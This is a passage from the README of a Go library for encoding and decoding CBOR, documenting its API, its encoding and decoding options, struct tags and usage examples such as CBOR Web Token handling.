Preferred Serialization\nfunc CanonicalEncOptions() EncOptions {} // RFC 7049 Canonical CBOR\nfunc CTAP2EncOptions() EncOptions {} // FIDO2 CTAP2 Canonical CBOR\n```\n\nThe empty curly braces prevent a syntax highlighting bug on GitHub, please ignore them.\n\n__Struct Tags (keyasint, toarray, omitempty)__\n\nThe `keyasint`, `toarray`, and `omitempty` struct tags make it easy to use compact CBOR message formats. Internet standards often use CBOR arrays and CBOR maps with int keys to save space.\n\nThe following sections provide more info:\n\n* [Struct Tags](#struct-tags-1)\n* [Decoding Options](#decoding-options)\n* [Encoding Options](#encoding-options)\n* [API](#api) \n* [Usage](#usage) \n\n
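__Creating and Using Decoding Modes__\n\nThe decoding side mirrors the encoding-mode example above. Below is a minimal sketch (here `b`, `v`, `r`, and the 1 MiB limit are placeholders rather than values from this README) that also applies the `io.LimitReader` advice from the top of this section:\n\n```go\n// Create DecOptions; limits such as MaxNestedLevels are optional.\nopts := cbor.DecOptions{MaxNestedLevels: 16}\n\n// Create reusable DecMode interface with immutable options, safe for concurrent use.\ndm, err := opts.DecMode()\n\n// Use DecMode like encoding/json, with same function signatures.\nerr = dm.Unmarshal(b, &v) // decode []byte b to v\n\n// When reading very large or indefinite length data from io.Reader r, cap its size.\ndecoder := dm.NewDecoder(io.LimitReader(r, 1<<20)) // placeholder 1 MiB limit\nerr = decoder.Decode(&v) // decode from io.Reader r to v\n```\n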
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Features\n\n### Standard API\n\nMany function signatures are identical to encoding/json, including: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, `(*Decoder).Decode`.\n\n`RawMessage` can be used to delay CBOR decoding or precompute CBOR encoding, like `encoding/json`.\n\nStandard interfaces allow user-defined types to have custom CBOR encoding and decoding. They include: \n`BinaryMarshaler`, `BinaryUnmarshaler`, `Marshaler`, and `Unmarshaler`.\n\n`Marshaler` and `Unmarshaler` interfaces are satisfied by `MarshalCBOR` and `UnmarshalCBOR` functions using same params and return types as Go's MarshalJSON and UnmarshalJSON.\n\n### Struct Tags\n\nSupport \"cbor\" and \"json\" keys in Go's struct tags. If both are specified for the same field, then \"cbor\" is used.\n\n* a different field name can be specified, like encoding/json.\n* `omitempty` omits (ignores) field if value is empty, like encoding/json.\n* `-` always omits (ignores) field, like encoding/json.\n* `keyasint` treats fields as elements of CBOR maps with specified int key.\n* `toarray` treats fields as elements of CBOR arrays.\n\nSee [Struct Tags](#struct-tags-1) for more info.\n\n### CBOR Tags (New in v2.1)\n\nThere are three categories of CBOR tags:\n\n* __Default built-in CBOR tags__ currently include tag numbers 0 (Standard Date/Time), 1 (Epoch Date/Time), 2 (Unsigned Bignum), 3 (Negative Bignum), 55799 (Self-Described CBOR). \n\n* __Optional built-in CBOR tags__ may be provided in the future via build flags or optional package(s) to help reduce bloat.\n\n* __User-defined CBOR tags__ are easy by using TagSet to associate tag numbers to user-defined Go types.\n\n### Preferred Serialization\n\nPreferred serialization encodes integers and floating-point values using the fewest bytes possible.\n\n* Integers are always encoded using the fewest bytes possible.\n* Floating-point values can optionally encode from float64->float32->float16 when values fit.\n\n### Compact Data Size\n\nThe combination of preferred serialization and struct tags (toarray, keyasint, omitempty) allows very compact data size.\n\n### Predefined Encoding Options\n\nEasy-to-use functions (no params) return preset EncOptions struct: \n`CanonicalEncOptions`, `CTAP2EncOptions`, `CoreDetEncOptions`, `PreferredUnsortedEncOptions`\n\n### Encoding Options\n\nIntegers always encode to the shortest form that preserves value. By default, time values are encoded without tags.\n\nEncoding of other data types and map key sort order are determined by encoder options.\n\n| EncOptions | Available Settings (defaults listed first)\n| :--- | :--- |\n| Sort | **SortNone**, SortLengthFirst, SortBytewiseLexical
Aliases: SortCanonical, SortCTAP2, SortCoreDeterministic |\n| Time | **TimeUnix**, TimeUnixMicro, TimeUnixDynamic, TimeRFC3339, TimeRFC3339Nano |\n| TimeTag | **EncTagNone**, EncTagRequired |\n| ShortestFloat | **ShortestFloatNone**, ShortestFloat16 |\n| BigIntConvert | **BigIntConvertShortest**, BigIntConvertNone |\n| InfConvert | **InfConvertFloat16**, InfConvertNone |\n| NaNConvert | **NaNConvert7e00**, NaNConvertNone, NaNConvertQuiet, NaNConvertPreserveSignal |\n| IndefLength | **IndefLengthAllowed**, IndefLengthForbidden |\n| TagsMd | **TagsAllowed**, TagsForbidden |\n\nSee [Options](#options) section for details about each setting.\n\n### Decoding Options\n\n| DecOptions | Available Settings (defaults listed first) |\n| :--- | :--- |\n| TimeTag | **DecTagIgnored**, DecTagOptional, DecTagRequired |\n| DupMapKey | **DupMapKeyQuiet**, DupMapKeyEnforcedAPF |\n| IntDec | **IntDecConvertNone**, IntDecConvertSigned |\n| IndefLength | **IndefLengthAllowed**, IndefLengthForbidden |\n| TagsMd | **TagsAllowed**, TagsForbidden |\n| ExtraReturnErrors | **ExtraDecErrorNone**, ExtraDecErrorUnknownField |\n| MaxNestedLevels | **32**, can be set to [4, 65535] |\n| MaxArrayElements | **131072**, can be set to [16, 2147483647] |\n| MaxMapPairs | **131072**, can be set to [16, 2147483647] |\n\nSee [Options](#options) section for details about each setting.\n\n### Additional Features\n\n* Decoder always checks for invalid UTF-8 string errors.\n* Decoder always decodes in-place to slices, maps, and structs.\n* Decoder tries case-sensitive first and falls back to case-insensitive field name match when decoding to structs. \n* Decoder supports decoding registered CBOR tag data to interface types. \n* Both encoder and decoder support indefinite length CBOR data ([\"streaming\"](https://tools.ietf.org/html/rfc7049#section-2.2)).\n* Both encoder and decoder correctly handles nil slice, map, pointer, and interface values.\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Standards\nThis library is a full-featured generic CBOR [(RFC 8949)](https://tools.ietf.org/html/rfc8949) encoder and decoder. Notable CBOR features include:\n\n| | CBOR Feature | Description |\n| :--- | :--- | :--- |\n| \u2611\ufe0f | CBOR tags | API supports built-in and user-defined tags. |\n| \u2611\ufe0f | Preferred serialization | Integers encode to fewest bytes. Optional float64 \u2192 float32 \u2192 float16. |\n| \u2611\ufe0f | Map key sorting | Unsorted, length-first (Canonical CBOR), and bytewise-lexicographic (CTAP2). |\n| \u2611\ufe0f | Duplicate map keys | Always forbid for encoding and option to allow/forbid for decoding. |\n| \u2611\ufe0f | Indefinite length data | Option to allow/forbid for encoding and decoding. |\n| \u2611\ufe0f | Well-formedness | Always checked and enforced. |\n| \u2611\ufe0f | Basic validity checks | Check UTF-8 validity and optionally check duplicate map keys. |\n| \u2611\ufe0f | Security considerations | Prevent integer overflow and resource exhaustion (RFC 8949 Section 10). |\n\nSee the Features section for list of [Encoding Options](#encoding-options) and [Decoding Options](#decoding-options).\n\nKnown limitations are noted in the [Limitations section](#limitations). \n\nGo nil values for slices, maps, pointers, etc. are encoded as CBOR null. Empty slices, maps, etc. are encoded as empty CBOR arrays and maps.\n\nDecoder checks for all required well-formedness errors, including all \"subkinds\" of syntax errors and too little data.\n\nAfter well-formedness is verified, basic validity errors are handled as follows:\n\n* Invalid UTF-8 string: Decoder always checks and returns invalid UTF-8 string error.\n* Duplicate keys in a map: Decoder has options to ignore or enforce rejection of duplicate map keys.\n\nWhen decoding well-formed CBOR arrays and maps, decoder saves the first error it encounters and continues with the next item. Options to handle this differently may be added in the future.\n\nBy default, decoder treats time values of floating-point NaN and Infinity as if they are CBOR Null or CBOR Undefined.\n\nSee [Options](#options) section for detailed settings or [Features](#features) section for a summary of options.\n\n__Click to expand topic:__\n\n
\n__Duplicate Map Keys__

\n\nThis library provides options for fast detection and rejection of duplicate map keys based on applying a Go-specific data model to CBOR's extended generic data model in order to determine duplicate vs distinct map keys. Detection relies on whether the CBOR map key would be a duplicate \"key\" when decoded and applied to the user-provided Go map or struct. \n\n`DupMapKeyQuiet` turns off detection of duplicate map keys. It tries to use a \"keep fastest\" method by choosing either \"keep first\" or \"keep last\" depending on the Go data type.\n\n`DupMapKeyEnforcedAPF` enforces detection and rejection of duplicate map keys. Decoding stops immediately and returns `DupMapKeyError` when the first duplicate key is detected. The error includes the duplicate map key and the index number. \n\nThe APF suffix means \"Allow Partial Fill\" so the destination map or struct can contain some decoded values at the time of error. It is the caller's responsibility to respond to the `DupMapKeyError` by discarding the partially filled result if that's required by their protocol.\n\n
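A minimal sketch of turning this on (the `data` bytes and the destination map are placeholders for your own protocol):\n\n```go\n// Reject duplicate map keys instead of quietly keeping one of them.\ndm, _ := cbor.DecOptions{DupMapKey: cbor.DupMapKeyEnforcedAPF}.DecMode()\n\nvar m map[string]int\nif err := dm.Unmarshal(data, &m); err != nil {\n\t// On a duplicate key this is a DupMapKeyError; m may be partially filled\n\t// (\"Allow Partial Fill\"), so discard it if your protocol requires that.\n\treturn err\n}\n```\n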

\n\n
\n__Tag Validity__

\n\nThis library checks tag validity for built-in tags (currently tag numbers 0, 1, 2, 3, and 55799):\n\n* Inadmissible type for tag content \n* Inadmissible value for tag content\n\nUnknown tag data items (not tag number 0, 1, 2, 3, or 55799) are handled in two ways:\n\n* When decoding into an empty interface, unknown tag data item will be decoded into `cbor.Tag` data type, which contains tag number and tag content. The tag content will be decoded into the default Go data type for the CBOR data type.\n* When decoding into other Go types, unknown tag data item is decoded into the specified Go type. If Go type is registered with a tag number, the tag number can optionally be verified.\n\nDecoder also has an option to forbid tag data items (treat any tag data item as error) which is specified by protocols such as CTAP2 Canonical CBOR. \n\nFor more information, see [decoding options](#decoding-options-1) and [tag options](#tag-options).\n\n
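As a small sketch of the empty-interface case above (tag number 280 and the string content are arbitrary values chosen only for illustration), an unregistered tag decodes into `cbor.Tag`:\n\n```go\n// 0xd9 0x01 0x18 is tag number 280; 0x62 0x68 0x69 is the text string \"hi\".\ndata := []byte{0xd9, 0x01, 0x18, 0x62, 0x68, 0x69}\n\nvar v interface{}\nif err := cbor.Unmarshal(data, &v); err != nil {\n\treturn err\n}\n// Tag 280 is not registered, so v holds cbor.Tag{Number: 280, Content: \"hi\"}.\n```\n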

\n\n## Limitations\n\nIf any of these limitations prevent you from using this library, please open an issue along with a link to your project.\n\n* CBOR `Undefined` (0xf7) value decodes to Go's `nil` value. CBOR `Null` (0xf6) more closely matches Go's `nil`.\n* CBOR `simple values` that are unassigned/reserved by IANA are not fully supported until PR #370.\n* CBOR map keys with data types not supported by Go for map keys are ignored and an error is returned after continuing to decode remaining items. \n* When using io.Reader interface to read very large or indefinite length CBOR data, Go's `io.LimitReader` should be used to limit size.\n* When decoding registered CBOR tag data to interface type, decoder creates a pointer to registered Go type matching CBOR tag number. Requiring a pointer for this is a Go limitation. \n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## API\nMany function signatures are identical to Go's encoding/json, such as: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, and `(*Decoder).Decode`.\n\nInterfaces identical or comparable to Go's encoding, encoding/json, or encoding/gob include: \n`Marshaler`, `Unmarshaler`, `BinaryMarshaler`, and `BinaryUnmarshaler`.\n\nLike `encoding/json`, `RawMessage` can be used to delay CBOR decoding or precompute CBOR encoding.\n\n\"Mode\" in this API means defined way of encoding or decoding -- it links the standard API to CBOR options and CBOR tags.\n\nEncMode and DecMode are interfaces created from EncOptions or DecOptions structs. \nFor example, `em, err := cbor.EncOptions{...}.EncMode()` or `em, err := cbor.CanonicalEncOptions().EncMode()`.\n\nEncMode and DecMode use immutable options so their behavior won't accidentally change at runtime. Modes are intended to be reused and are safe for concurrent use.\n\n__API for Default Mode__\n\nIf default options are acceptable, then you don't need to create EncMode or DecMode.\n\n```go\nMarshal(v interface{}) ([]byte, error)\nNewEncoder(w io.Writer) *Encoder\n\nUnmarshal(data []byte, v interface{}) error\nNewDecoder(r io.Reader) *Decoder\n```\n\n__API for Creating & Using Encoding Modes__\n\n```go\n// EncMode interface uses immutable options and is safe for concurrent use.\ntype EncMode interface {\n\tMarshal(v interface{}) ([]byte, error)\n\tNewEncoder(w io.Writer) *Encoder\n\tEncOptions() EncOptions // returns copy of options\n}\n\n// EncOptions specifies encoding options.\ntype EncOptions struct {\n...\n}\n\n// EncMode returns an EncMode interface created from EncOptions.\nfunc (opts EncOptions) EncMode() (EncMode, error) {}\n\n// EncModeWithTags returns EncMode with options and tags that are both immutable. \nfunc (opts EncOptions) EncModeWithTags(tags TagSet) (EncMode, error) {}\n\n// EncModeWithSharedTags returns EncMode with immutable options and mutable shared tags. \nfunc (opts EncOptions) EncModeWithSharedTags(tags TagSet) (EncMode, error) {}\n```\n\nThe empty curly braces prevent a syntax highlighting bug, please ignore them.\n\n__API for Predefined Encoding Options__\n\n```go\nfunc CoreDetEncOptions() EncOptions {} // RFC 8949 Core Deterministic Encoding\nfunc PreferredUnsortedEncOptions() EncOptions {} // RFC 8949 Preferred Serialization\nfunc CanonicalEncOptions() EncOptions {} // RFC 7049 Canonical CBOR\nfunc CTAP2EncOptions() EncOptions {} // FIDO2 CTAP2 Canonical CBOR\n```\n\n__API for Creating & Using Decoding Modes__\n\n```go\n// DecMode interface uses immutable options and is safe for concurrent use.\ntype DecMode interface {\n\tUnmarshal(data []byte, v interface{}) error\n\tNewDecoder(r io.Reader) *Decoder\n\tDecOptions() DecOptions // returns copy of options\n}\n\n// DecOptions specifies decoding options.\ntype DecOptions struct {\n...\n}\n\n// DecMode returns a DecMode interface created from DecOptions.\nfunc (opts DecOptions) DecMode() (DecMode, error) {}\n\n// DecModeWithTags returns DecMode with options and tags that are both immutable. \nfunc (opts DecOptions) DecModeWithTags(tags TagSet) (DecMode, error) {}\n\n// DecModeWithSharedTags returns DecMode with immutable options and mutable shared tags. 
\nfunc (opts DecOptions) DecModeWithSharedTags(tags TagSet) (DecMode, error) {}\n```\n\nThe empty curly braces prevent a syntax highlighting bug, please ignore them.\n\n__API for Using CBOR Tags__\n\n`TagSet` can be used to associate user-defined Go type(s) to tag number(s). It's also used to create EncMode or DecMode. For example, `em := EncOptions{...}.EncModeWithTags(ts)` or `em := EncOptions{...}.EncModeWithSharedTags(ts)`. This allows every standard API exported by em (like `Marshal` and `NewEncoder`) to use the specified tags automatically.\n\n`Tag` and `RawTag` can be used to encode/decode a tag number with a Go value, but `TagSet` is generally recommended.\n\n```go\ntype TagSet interface {\n // Add adds given tag number(s), content type, and tag options to TagSet.\n Add(opts TagOptions, contentType reflect.Type, num uint64, nestedNum ...uint64) error\n\n // Remove removes given tag content type from TagSet.\n Remove(contentType reflect.Type) \n}\n```\n\n`Tag` and `RawTag` types can also be used to encode/decode tag number with Go value.\n\n```go\ntype Tag struct {\n Number uint64\n Content interface{}\n}\n\ntype RawTag struct {\n Number uint64\n Content RawMessage\n}\n```\n\nSee [API docs (godoc.org)](https://godoc.org/github.com/fxamacker/cbor/v2) for more details and more functions. See [Usage section](#usage) for usage and code examples.\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Options\n\nStruct tags, decoding options, and encoding options.\n\n### Struct Tags\n\nThis library supports both \"cbor\" and \"json\" keys for some (not all) struct tags. If \"cbor\" and \"json\" keys are both present for the same field, then \"cbor\" key will be used.\n\n| Key | Format Str | Scope | Description |\n| --- | ---------- | ----- | ------------|\n| cbor or json | \"myName\" | field | Name of field to use such as \"myName\", etc. like encoding/json. |\n| cbor or json | \",omitempty\" | field | Omit (ignore) this field if value is empty, like encoding/json. |\n| cbor or json | \"-\" | field | Omit (ignore) this field always, like encoding/json. |\n| cbor | \",keyasint\" | field | Treat field as an element of CBOR map with specified int as key. |\n| cbor | \",toarray\" | struct | Treat each field as an element of CBOR array. This automatically disables \"omitempty\" and \"keyasint\" for all fields in the struct. |\n\nThe \"keyasint\" struct tag requires an integer key to be specified:\n\n```\ntype myStruct struct {\n MyField int64 `cbor:\"-1,keyasint,omitempty\"`\n OurField string `cbor:\"0,keyasint,omitempty\"`\n FooField Foo `cbor:\"5,keyasint,omitempty\"`\n BarField Bar `cbor:\"hello,omitempty\"`\n ...\n}\n```\n\nThe \"toarray\" struct tag requires a special field \"_\" (underscore) to indicate \"toarray\" applies to the entire struct:\n\n```\ntype myStruct struct {\n _ struct{} `cbor:\",toarray\"`\n MyField int64\n OurField string\n ...\n}\n```\n\n__Click to expand:__\n\n
\n__Example Using CBOR Web Tokens__

\n \n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_struct_tags_api.svg?sanitize=1 \"CBOR API and Go Struct Tags\")\n\n

\n\n### Decoding Options\n\n| DecOptions.TimeTag | Description |\n| ------------------ | ----------- |\n| DecTagIgnored (default) | Tag numbers are ignored (if present) for time values. |\n| DecTagOptional | Tag numbers are only checked for validity if present for time values. |\n| DecTagRequired | Tag numbers must be provided for time values except for CBOR Null and CBOR Undefined. |\n\nThe following CBOR time values are decoded as Go's \"zero time instant\":\n\n* CBOR Null\n* CBOR Undefined\n* CBOR floating-point NaN\n* CBOR floating-point Infinity\n\nGo's `time` package provides `IsZero` function, which reports whether t represents \"zero time instant\" \n(January 1, year 1, 00:00:00 UTC).\n\n
\n\n| DecOptions.DupMapKey | Description |\n| -------------------- | ----------- |\n| DupMapKeyQuiet (default) | turns off detection of duplicate map keys. It uses a \"keep fastest\" method by choosing either \"keep first\" or \"keep last\" depending on the Go data type. |\n| DupMapKeyEnforcedAPF | enforces detection and rejection of duplicate map keys. Decoding stops immediately and returns `DupMapKeyError` when the first duplicate key is detected. The error includes the duplicate map key and the index number. |\n\n`DupMapKeyEnforcedAPF` uses \"Allow Partial Fill\" so the destination map or struct can contain some decoded values at the time of error. Users can respond to the `DupMapKeyError` by discarding the partially filled result if that's required by their protocol.\n\n
\n\n| DecOptions.IntDec | Description |\n| ------------------ | ----------- |\n| IntDecConvertNone (default) | When decoding to Go interface{}, CBOR positive int (major type 0) decodes to a uint64 value, and CBOR negative int (major type 1) decodes to an int64 value. |\n| IntDecConvertSigned | When decoding to Go interface{}, CBOR positive/negative int (major type 0 and 1) decodes to an int64 value. |\n\nIf `IntDecConvertSigned` is used and the value overflows int64, an UnmarshalTypeError is returned.\n\n
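For example (a small sketch; the encoded value 42 is arbitrary):\n\n```go\ndm, _ := cbor.DecOptions{IntDec: cbor.IntDecConvertSigned}.DecMode()\n\nb, _ := cbor.Marshal(uint64(42)) // a CBOR positive int (major type 0)\n\nvar v interface{}\n_ = dm.Unmarshal(b, &v)\n// With IntDecConvertSigned, v is int64(42); with the default IntDecConvertNone it would be uint64(42).\n```\n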
\n\n| DecOptions.IndefLength | Description |\n| ---------------------- | ----------- |\n|IndefLengthAllowed (default) | allow indefinite length data |\n|IndefLengthForbidden | forbid indefinite length data |\n\n
\n\n| DecOptions.TagsMd | Description |\n| ----------------- | ----------- |\n|TagsAllowed (default) | allow CBOR tags (major type 6) |\n|TagsForbidden | forbid CBOR tags (major type 6) |\n\n
\n\n| DecOptions.ExtraReturnErrors | Description |\n| ----------------- | ----------- |\n|ExtraDecErrorNone (default) | no extra decoding errors. E.g. ignore unknown fields if encountered. |\n|ExtraDecErrorUnknownField | return error if unknown field is encountered |\n\n
\n\n| DecOptions.MaxNestedLevels | Description |\n| -------------------------- | ----------- |\n| 32 (default) | allowed setting is [4, 65535] |\n\n
\n\n| DecOptions.MaxArrayElements | Description |\n| --------------------------- | ----------- |\n| 131072 (default) | allowed setting is [16, 2147483647] |\n\n
\n\n| DecOptions.MaxMapPairs | Description |\n| ---------------------- | ----------- |\n| 131072 (default) | allowed setting is [16, 2147483647] |\n\n### Encoding Options\n\n__Integers always encode to the shortest form that preserves value__. Encoding of other data types and map key sort order are determined by encoding options.\n\nThese functions are provided to create and return a modifiable EncOptions struct with predefined settings.\n\n| Predefined EncOptions | Description |\n| --------------------- | ----------- |\n| CanonicalEncOptions() |[Canonical CBOR (RFC 7049 Section 3.9)](https://tools.ietf.org/html/rfc7049#section-3.9). |\n| CTAP2EncOptions() |[CTAP2 Canonical CBOR (FIDO2 CTAP2)](https://fidoalliance.org/specs/fido-v2.0-id-20180227/fido-client-to-authenticator-protocol-v2.0-id-20180227.html#ctap2-canonical-cbor-encoding-form). |\n| PreferredUnsortedEncOptions() |Unsorted, encode float64->float32->float16 when values fit, NaN values encoded as float16 0x7e00. |\n| CoreDetEncOptions() |PreferredUnsortedEncOptions() + map keys are sorted bytewise lexicographic. |\n\n
\n\n| EncOptions.Sort | Description |\n| --------------- | ----------- |\n| SortNone (default) |No sorting for map keys. |\n| SortLengthFirst |Length-first map key ordering. |\n| SortBytewiseLexical |Bytewise lexicographic map key ordering [(RFC 8949 Section 4.2.1)](https://datatracker.ietf.org/doc/html/rfc8949#section-4.2.1).|\n| SortCanonical |(alias) Same as SortLengthFirst [(RFC 7049 Section 3.9)](https://tools.ietf.org/html/rfc7049#section-3.9) |\n| SortCTAP2 |(alias) Same as SortBytewiseLexical [(CTAP2 Canonical CBOR)](https://fidoalliance.org/specs/fido-v2.0-id-20180227/fido-client-to-authenticator-protocol-v2.0-id-20180227.html#ctap2-canonical-cbor-encoding-form). |\n| SortCoreDeterministic |(alias) Same as SortBytewiseLexical [(RFC 8949 Section 4.2.1)](https://datatracker.ietf.org/doc/html/rfc8949#section-4.2.1). |\n\n
\n\n| EncOptions.Time | Description |\n| --------------- | ----------- |\n| TimeUnix (default) | (seconds) Encode as integer. |\n| TimeUnixMicro | (microseconds) Encode as floating-point. ShortestFloat option determines size. |\n| TimeUnixDynamic | (seconds or microseconds) Encode as integer if time doesn't have fractional seconds, otherwise encode as floating-point rounded to microseconds. |\n| TimeRFC3339 | (seconds) Encode as RFC 3339 formatted string. |\n| TimeRFC3339Nano | (nanoseconds) Encode as RFC3339 formatted string. |\n\n
\n\n| EncOptions.TimeTag | Description |\n| ------------------ | ----------- |\n| EncTagNone (default) | Tag number will not be encoded for time values. |\n| EncTagRequired | Tag number (0 or 1) will be encoded unless time value is undefined/zero-instant. |\n\nBy default, undefined (zero instant) time values will encode as CBOR Null without tag number for both EncTagNone and EncTagRequired. Although CBOR Undefined might be technically more correct for EncTagRequired, CBOR Undefined might not be supported by other generic decoders and it isn't supported by JSON.\n\nGo's `time` package provides `IsZero` function, which reports whether t represents the zero time instant, January 1, year 1, 00:00:00 UTC. \n\n
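A small sketch combining the `Time` and `TimeTag` settings above (the options chosen here are just one possible combination; `time` is the standard library package):\n\n```go\n// Encode time.Time values as RFC 3339 strings wrapped in CBOR tag 0 (Standard Date/Time).\nopts := cbor.EncOptions{Time: cbor.TimeRFC3339, TimeTag: cbor.EncTagRequired}\nem, _ := opts.EncMode()\n\nb, _ := em.Marshal(time.Now()) // tag 0 wrapping an RFC 3339 text string\n\nvar zero time.Time\nb2, _ := em.Marshal(zero) // zero-instant time encodes as CBOR Null, without a tag number\n```\n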
\n\n| EncOptions.BigIntConvert | Description |\n| ------------------------ | ----------- |\n| BigIntConvertShortest (default) | Encode big.Int as CBOR integer if value fits. |\n| BigIntConvertNone | Encode big.Int as CBOR bignum (tag 2 or 3). |\n\n
\n\n__Floating-Point Options__\n\nEncoder has 3 types of options for floating-point data: ShortestFloatMode, InfConvertMode, and NaNConvertMode.\n\n| EncOptions.ShortestFloat | Description |\n| ------------------------ | ----------- |\n| ShortestFloatNone (default) | No size conversion. Encode float32 and float64 to CBOR floating-point of same bit-size. |\n| ShortestFloat16 | Encode float64 -> float32 -> float16 ([IEEE 754 binary16](https://en.wikipedia.org/wiki/Half-precision_floating-point_format)) when values fit. |\n\nConversions for infinity and NaN use InfConvert and NaNConvert settings.\n\n| EncOptions.InfConvert | Description |\n| --------------------- | ----------- |\n| InfConvertFloat16 (default) | Convert +- infinity to float16 since they always preserve value (recommended) |\n| InfConvertNone |Don't convert +- infinity to other representations -- used by CTAP2 Canonical CBOR |\n\n
\n\n| EncOptions.NaNConvert | Description |\n| --------------------- | ----------- |\n| NaNConvert7e00 (default) | Encode to 0xf97e00 (CBOR float16 = 0x7e00) -- used by RFC 8949 Preferred Encoding, etc. |\n| NaNConvertNone | Don't convert NaN to other representations -- used by CTAP2 Canonical CBOR. |\n| NaNConvertQuiet | Force quiet bit = 1 and use shortest form that preserves NaN payload. |\n| NaNConvertPreserveSignal | Convert to smallest form that preserves value (quiet bit unmodified and NaN payload preserved). |\n\n
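A small sketch of the floating-point settings above (the value 1.5 is arbitrary; it happens to be exactly representable in float16):\n\n```go\nopts := cbor.EncOptions{ShortestFloat: cbor.ShortestFloat16}\nem, _ := opts.EncMode()\n\nb, _ := em.Marshal(float64(1.5))\n// b is 3 bytes, 0xf9 0x3e 0x00: a CBOR float16, because 1.5 fits without losing precision.\n```\n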
\n\n| EncOptions.IndefLength | Description |\n| ---------------------- | ----------- |\n|IndefLengthAllowed (default) | allow indefinite length data |\n|IndefLengthForbidden | forbid indefinite length data |\n\n
\n\n| EncOptions.TagsMd | Description |\n| ----------------- | ----------- |\n|TagsAllowed (default) | allow CBOR tags (major type 6) |\n|TagsForbidden | forbid CBOR tags (major type 6) |\n\n\n### Tag Options\n\nTagOptions specifies how encoder and decoder handle tag number registered with TagSet.\n\n| TagOptions.DecTag | Description |\n| ------------------ | ----------- |\n| DecTagIgnored (default) | Tag numbers are ignored (if present). |\n| DecTagOptional | Tag numbers are only checked for validity if present. |\n| DecTagRequired | Tag numbers must be provided except for CBOR Null and CBOR Undefined. |\n\n
\n\n| TagOptions.EncTag | Description |\n| ------------------ | ----------- |\n| EncTagNone (default) | Tag number will not be encoded. |\n| EncTagRequired | Tag number will be encoded. |\n\t\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Usage\n\ud83d\udee1\ufe0f Use Go's `io.LimitReader` to limit size when decoding very large or indefinite size data.\n\nFunctions with identical signatures to encoding/json include: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, `(*Decoder).Decode`.\n\n__Default Mode__ \n\nIf default options are acceptable, package level functions can be used for encoding and decoding.\n\n```go\nb, err := cbor.Marshal(v) // encode v to []byte b\n\nerr := cbor.Unmarshal(b, &v) // decode []byte b to v\n\nencoder := cbor.NewEncoder(w) // create encoder with io.Writer w\n\ndecoder := cbor.NewDecoder(r) // create decoder with io.Reader r\n```\n\n__Modes__\n\nIf you need to use options or CBOR tags, then you'll want to create a mode.\n\n\"Mode\" means defined way of encoding or decoding -- it links the standard API to your CBOR options and CBOR tags. This way, you don't pass around options and the API remains identical to `encoding/json`.\n\nEncMode and DecMode are interfaces created from EncOptions or DecOptions structs. \nFor example, `em, err := cbor.EncOptions{...}.EncMode()` or `em, err := cbor.CanonicalEncOptions().EncMode()`.\n\nEncMode and DecMode use immutable options so their behavior won't accidentally change at runtime. Modes are reusable, safe for concurrent use, and allow fast parallelism.\n\n__Creating and Using Encoding Modes__\n\nEncMode is an interface ([API](#api)) created from EncOptions struct. EncMode uses immutable options after being created and is safe for concurrent use. For best performance, EncMode should be reused.\n\n```go\n// Create EncOptions using either struct literal or a function.\nopts := cbor.CanonicalEncOptions()\n\n// If needed, modify opts. For example: opts.Time = cbor.TimeUnix\n\n// Create reusable EncMode interface with immutable options, safe for concurrent use.\nem, err := opts.EncMode() \n\n// Use EncMode like encoding/json, with same function signatures.\nb, err := em.Marshal(v) // encode v to []byte b\n\nencoder := em.NewEncoder(w) // create encoder with io.Writer w\nerr := encoder.Encode(v) // encode v to io.Writer w\n```\n\n__Struct Tags (keyasint, toarray, omitempty)__\n\nThe `keyasint`, `toarray`, and `omitempty` struct tags make it easy to use compact CBOR message formats. Internet standards often use CBOR arrays and CBOR maps with int keys to save space.\n\n
\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_struct_tags_api.svg?sanitize=1 \"CBOR API and Struct Tags\")\n\n
\n\n__Decoding CWT (CBOR Web Token)__ using `keyasint` and `toarray` struct tags:\n\n```go\n// Signed CWT is defined in RFC 8392\ntype signedCWT struct {\n\t_ struct{} `cbor:\",toarray\"`\n\tProtected []byte\n\tUnprotected coseHeader\n\tPayload []byte\n\tSignature []byte\n}\n\n// Part of COSE header definition\ntype coseHeader struct {\n\tAlg int `cbor:\"1,keyasint,omitempty\"`\n\tKid []byte `cbor:\"4,keyasint,omitempty\"`\n\tIV []byte `cbor:\"5,keyasint,omitempty\"`\n}\n\n// data is []byte containing signed CWT\n\nvar v signedCWT\nif err := cbor.Unmarshal(data, &v); err != nil {\n\treturn err\n}\n```\n\n__Encoding CWT (CBOR Web Token)__ using `keyasint` and `toarray` struct tags:\n\n```go\n// Use signedCWT struct defined in \"Decoding CWT\" example.\n\nvar v signedCWT\n...\nif data, err := cbor.Marshal(v); err != nil {\n\treturn err\n}\n```\n\n__Encoding and Decoding CWT (CBOR Web Token) with CBOR Tags__\n\n```go\n// Use signedCWT struct defined in \"Decoding CWT\" example.\n\n// Create TagSet (safe for concurrency).\ntags := cbor.NewTagSet()\n// Register tag COSE_Sign1 18 with signedCWT 